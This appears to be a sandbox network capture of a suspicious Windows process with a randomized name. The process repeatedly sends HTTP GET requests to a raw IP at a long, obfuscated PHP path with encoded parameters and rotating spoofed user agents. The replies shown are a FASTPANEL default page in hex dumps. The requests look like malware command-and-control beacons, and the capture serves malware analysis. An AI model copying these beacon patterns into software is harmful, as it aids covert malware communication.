                                              Nov 27, 2024 04:02:07.712650061 CET672INData Raw: 38 35 33 36 36 72 65 6d 20 2b 20 2e 37 33 31 37 30 37 33 31 37 31 76 77 20 2c 31 2e 30 36 32 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 66 6f 6e 74 2d 73 69 7a 65 3a 63 6c 61 6d 70 28 30 2e 38 37 35 72 65 6d 20 2c 30 2e 37
                                              Data Ascii: 85366rem + .7317073171vw ,1.0625rem)}}@supports not (font-size:clamp(0.875rem ,0.7286585366rem + 0.7317073171vw ,1.0625rem)){.window-main__body{font-size:calc(.875rem + .1875*(100vw - 20rem)/ 25.625)}}@supports (margin-bottom:clamp(1.5rem ,1.2
                                              Nov 27, 2024 04:02:07.712729931 CET1236INData Raw: 72 65 6d 20 2c 2e 34 36 34 39 33 39 30 32 34 34 72 65 6d 20 2b 20 2e 34 38 37 38 30 34 38 37 38 76 77 20 2c 2e 36 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70 28 30
                                              Data Ascii: rem ,.4649390244rem + .487804878vw ,.6875rem)}}@supports not (padding-left:clamp(0.5625rem ,0.4649390244rem + 0.487804878vw ,0.6875rem)){.window-main__list{padding-left:calc(.5625rem + .125*(100vw - 20rem)/ 25.625)}}@supports (padding-left:cla
                                              Nov 27, 2024 04:02:07.712806940 CET1236INData Raw: 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 09 09 09 09 09 09 3c 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 37 22 20 66 69 6c 74 65 72 3d 22 75 72 6c 28 23 66 69 6c 74 65 72 30 5f 66
                                              Data Ascii: xmlns="http://www.w3.org/2000/svg"><g opacity="0.7" filter="url(#filter0_f_2001_5)"><path d="M360.522 563.421C360.522 563.421 276.147 497.448 257.174 430.814C238.2 364.18 250.761 287.368 285.228 259.25C319.696 231.133 363.018 2
                                              Nov 27, 2024 04:02:07.712817907 CET1236INData Raw: 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 31 32 34 22 20 72 65 73 75 6c 74 3d 22 65 66 66 65 63 74 31 5f 66 6f 72 65 67 72 6f 75 6e 64 42 6c 75 72 5f 32 30 30 31 5f 35 22 20 2f 3e 0a 09 09 09 09 09 09 09 3c 2f 66 69 6c 74 65 72 3e 0a 09 09 09
                                              Data Ascii: stdDeviation="124" result="effect1_foregroundBlur_2001_5" /></filter><filter id="filter1_f_2001_5" x="63.8591" y="146.319" width="394.544" height="426.142" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
                                              Nov 27, 2024 04:02:07.712830067 CET1236INData Raw: 73 20 70 6f 69 6e 74 65 64 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 2c 20 62 75 74 20 74 68 65 72 65 20 69 73 20 6e 6f 20 73 69 74 65 20 77 69 74 68 20 74 68 61 74 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e
                                              Data Ascii: s pointed to the server, but there is no site with that domain name on the server.</li><li class="window-main__item">You are accessing the site via HTTPS, but the site does not have an SSL certificate installed.</li><li class="
                                              Nov 27, 2024 04:02:07.833177090 CET896INData Raw: 3d 22 66 69 6c 74 65 72 30 5f 66 5f 32 30 30 31 5f 31 30 22 20 78 3d 22 30 2e 37 30 39 39 36 31 22 20 79 3d 22 32 30 38 2e 36 32 36 22 20 77 69 64 74 68 3d 22 35 31 30 2e 32 32 22 20 68 65 69 67 68 74 3d 22 35 38 30 2e 34 37 37 22 20 66 69 6c 74
                                              Data Ascii: ="filter0_f_2001_10" x="0.709961" y="208.626" width="510.22" height="580.477" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in=
                                              Nov 27, 2024 04:02:07.927748919 CET741OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/css
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1
                                              Host: 188.120.228.203
                                              Nov 27, 2024 04:02:08.378654003 CET1236INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:08 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,label{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-height:1;font-family:Roboto;font-size:.875rem;-ms-text-size-adjust:100%;-moz-text-size-adjust:100%;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;background-color:#000}button,input,textarea{font-family:Roboto;font-size:inherit;line-height:inherit;color:inherit;background-color:rgba(0,0,0,0)}input,textarea{width:


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.949746188.120.228.203808000C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 27, 2024 04:02:16.107333899 CET860OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/plain
                                              User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
                                              Host: 188.120.228.203
                                              Connection: Keep-Alive
                                              Nov 27, 2024 04:02:17.428755045 CET241INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes
                                              Nov 27, 2024 04:02:17.428841114 CET1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" co
                                              Nov 27, 2024 04:02:17.428879023 CET1236INData Raw: 6e 67 3a 6e 6f 6e 65 3b 6f 76 65 72 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 6e 6f 6e 65 7d 2e 77 72 61 70 70 65 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69
                                              Data Ascii: ng:none;overscroll-behavior:none}.wrapper{min-height:100%;display:flex;overflow:hidden}@supports (overflow:clip){.wrapper{overflow:clip}}.wrapper>main{flex:1 1 auto}.wrapper>*{min-width:0}.main{display:flex;align-items:center;justify-content:c
                                              Nov 27, 2024 04:02:17.429060936 CET448INData Raw: 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 2e 30 36 32 35 72 65 6d 3b 66 6f 6e
                                              Data Ascii: fy-content:center;align-items:center;text-align:center;border-radius:1.0625rem;font-weight:500;padding:.375rem .8125rem}@media (min-width:45.625em){.window-main__actions,.window-main__body{margin-top:1.875rem}.window-main{padding:3.75rem 8.937
                                              Nov 27, 2024 04:02:17.429070950 CET1236INData Raw: 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 32 30 65 6d 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 3a 31 2e 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65
                                              Data Ascii: }@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem}.window-main__list{padding-left:.5625rem}.window-main__ite
                                              Nov 27, 2024 04:02:17.429083109 CET1236INData Raw: 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 2e 32 35 36 30 39 37 35 36 31 72 65 6d 20 2b 20 38 2e 37 38 30 34 38 37 38 30 34 39 76 77 20 2c 33 2e 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e
                                              Data Ascii: n{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:calc(1.5rem + 2.25*(100vw - 20rem)/ 25.625)}}@supports (paddin
                                              Nov 27, 2024 04:02:17.429092884 CET448INData Raw: 6d 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34 31 76 77 20 2c 31 2e 38 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 6e 66 6f 7b 6d 61
                                              Data Ascii: m:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.w
                                              Nov 27, 2024 04:02:17.429294109 CET1236INData Raw: 72 65 6d 20 2c 2e 34 36 34 39 33 39 30 32 34 34 72 65 6d 20 2b 20 2e 34 38 37 38 30 34 38 37 38 76 77 20 2c 2e 36 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70 28 30
                                              Data Ascii: rem ,.4649390244rem + .487804878vw ,.6875rem)}}@supports not (padding-left:clamp(0.5625rem ,0.4649390244rem + 0.487804878vw ,0.6875rem)){.window-main__list{padding-left:calc(.5625rem + .125*(100vw - 20rem)/ 25.625)}}@supports (padding-left:cla
                                              Nov 27, 2024 04:02:17.429363012 CET1236INData Raw: 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 09 09 09 09 09 09 3c 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 37 22 20 66 69 6c 74 65 72 3d 22 75 72 6c 28 23 66 69 6c 74 65 72 30 5f 66
                                              Data Ascii: xmlns="http://www.w3.org/2000/svg"><g opacity="0.7" filter="url(#filter0_f_2001_5)"><path d="M360.522 563.421C360.522 563.421 276.147 497.448 257.174 430.814C238.2 364.18 250.761 287.368 285.228 259.25C319.696 231.133 363.018 2
                                              Nov 27, 2024 04:02:17.429378986 CET448INData Raw: 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 31 32 34 22 20 72 65 73 75 6c 74 3d 22 65 66 66 65 63 74 31 5f 66 6f 72 65 67 72 6f 75 6e 64 42 6c 75 72 5f 32 30 30 31 5f 35 22 20 2f 3e 0a 09 09 09 09 09 09 09 3c 2f 66 69 6c 74 65 72 3e 0a 09 09 09
                                              Data Ascii: stdDeviation="124" result="effect1_foregroundBlur_2001_5" /></filter><filter id="filter1_f_2001_5" x="63.8591" y="146.319" width="394.544" height="426.142" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
                                              Nov 27, 2024 04:02:17.548954010 CET1236INData Raw: 66 66 65 63 74 31 5f 66 6f 72 65 67 72 6f 75 6e 64 42 6c 75 72 5f 32 30 30 31 5f 35 22 20 2f 3e 0a 09 09 09 09 09 09 09 3c 2f 66 69 6c 74 65 72 3e 0a 09 09 09 09 09 09 09 3c 66 69 6c 74 65 72 20 69 64 3d 22 66 69 6c 74 65 72 32 5f 66 5f 32 30 30
                                              Data Ascii: ffect1_foregroundBlur_2001_5" /></filter><filter id="filter2_f_2001_5" x="59.2946" y="36.0856" width="514.378" height="571.162" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0"
                                              Nov 27, 2024 04:02:17.623728037 CET836OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/plain
                                              User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
                                              Host: 188.120.228.203
                                              Nov 27, 2024 04:02:18.055687904 CET241INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.949767188.120.228.20380
                                              TimestampBytes transferredDirectionData
                                              Nov 27, 2024 04:02:24.174798965 CET697OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/css
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                                              Host: 188.120.228.203
                                              Connection: Keep-Alive
                                              Nov 27, 2024 04:02:25.553308964 CET241INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes
                                              Nov 27, 2024 04:02:25.553406000 CET1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" co
                                              Nov 27, 2024 04:02:25.553419113 CET1236INData Raw: 6e 67 3a 6e 6f 6e 65 3b 6f 76 65 72 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 6e 6f 6e 65 7d 2e 77 72 61 70 70 65 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69
                                              Data Ascii: ng:none;overscroll-behavior:none}.wrapper{min-height:100%;display:flex;overflow:hidden}@supports (overflow:clip){.wrapper{overflow:clip}}.wrapper>main{flex:1 1 auto}.wrapper>*{min-width:0}.main{display:flex;align-items:center;justify-content:c
                                              Nov 27, 2024 04:02:25.553567886 CET1236INData Raw: 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 2e 30 36 32 35 72 65 6d 3b 66 6f 6e
                                              Data Ascii: fy-content:center;align-items:center;text-align:center;border-radius:1.0625rem;font-weight:500;padding:.375rem .8125rem}@media (min-width:45.625em){.window-main__actions,.window-main__body{margin-top:1.875rem}.window-main{padding:3.75rem 8.937
                                              Nov 27, 2024 04:02:25.553580999 CET1236INData Raw: 72 65 6d 29 2f 20 32 35 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 34 2e 33 30 34 38 37 38 30 34 38 38 72 65 6d 20 2b 20 32 39 2e 30 32 34 33 39 30
                                              Data Ascii: rem)/ 25.625)}}@supports (padding-right:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)){.window-main{padding-right:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)}}@supports not (padding-right:clamp(1.5rem ,-4.304878
                                              Nov 27, 2024 04:02:25.553594112 CET896INData Raw: 36 38 33 76 77 20 2c 32 2e 32 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 35 72 65 6d 20 2b 20 2e 37 35 2a 28 31 30 30 76 77 20 2d 20 32 30 72 65 6d 29 2f 20
                                              Data Ascii: 683vw ,2.25rem)){.window-main__title{font-size:calc(1.5rem + .75*(100vw - 20rem)/ 25.625)}}@supports (font-size:clamp(0.875rem ,0.7286585366rem + 0.7317073171vw ,1.0625rem)){.window-main__body{font-size:clamp(.875rem ,.7286585366rem + .7317073
                                              Nov 27, 2024 04:02:25.553744078 CET1236INData Raw: 72 65 6d 20 2c 2e 34 36 34 39 33 39 30 32 34 34 72 65 6d 20 2b 20 2e 34 38 37 38 30 34 38 37 38 76 77 20 2c 2e 36 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70 28 30
                                              Data Ascii: rem ,.4649390244rem + .487804878vw ,.6875rem)}}@supports not (padding-left:clamp(0.5625rem ,0.4649390244rem + 0.487804878vw ,0.6875rem)){.window-main__list{padding-left:calc(.5625rem + .125*(100vw - 20rem)/ 25.625)}}@supports (padding-left:cla
                                              Nov 27, 2024 04:02:25.553755999 CET224INData Raw: 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 09 09 09 09 09 09 3c 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 37 22 20 66 69 6c 74 65 72 3d 22 75 72 6c 28 23 66 69 6c 74 65 72 30 5f 66
                                              Data Ascii: xmlns="http://www.w3.org/2000/svg"><g opacity="0.7" filter="url(#filter0_f_2001_5)"><path d="M360.522 563.421C360.522 563.421 276.147 497.448 257.174 430.814C238.2 364.18 250.761 287.368 285.228 259.25C319.69
                                              Nov 27, 2024 04:02:25.553769112 CET1236INData Raw: 36 20 32 33 31 2e 31 33 33 20 33 36 33 2e 30 31 38 20 32 36 32 2e 33 35 36 20 33 38 31 2e 39 39 31 20 33 32 38 2e 39 39 43 32 38 37 2e 39 39 20 34 31 38 2e 34 37 32 20 33 36 30 2e 35 32 32 20 35 36 33 2e 34 32 31 20 33 36 30 2e 35 32 32 20 35 36
                                              Data Ascii: 6 231.133 363.018 262.356 381.991 328.99C287.99 418.472 360.522 563.421 360.522 563.421Z" fill="#00498D" /></g><g opacity="0.7" filter="url(#filter1_f_2001_5)"><ellipse cx="50.6112" cy="60.3996" rx="50.6112" ry="60.3996"
                                              Nov 27, 2024 04:02:25.553782940 CET1236INData Raw: 6c 74 65 72 73 3d 22 73 52 47 42 22 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 46 6c 6f 6f 64 20 66 6c 6f 6f 64 2d 6f 70 61 63 69 74 79 3d 22 30 22 20 72 65 73 75 6c 74 3d 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 2f 3e 0a 09 09
                                              Data Ascii: lters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="75" result="effect1_foregroundBl
                                              Nov 27, 2024 04:02:25.673710108 CET1236INData Raw: 0a 09 09 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 22 3e 59 6f 75 72 20 64 6f 6d 61 69 6e 20 68 61 73 20 61 6e 20 41 41 41 41 20 72 65 63 6f 72 64 2c 20 62 75 74 20 74 68 65 20 73 69 74 65
                                              Data Ascii: <li class="window-main__item">Your domain has an AAAA record, but the site only works with IPv4 on the server.</li></ul></div><div class="window-main__actions"><a href="https://kb.fastpanel.direct/troubleshoot
                                              Nov 27, 2024 04:02:25.676346064 CET673OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/css
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                                              Host: 188.120.228.203
                                              Nov 27, 2024 04:02:26.124521017 CET1236INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes
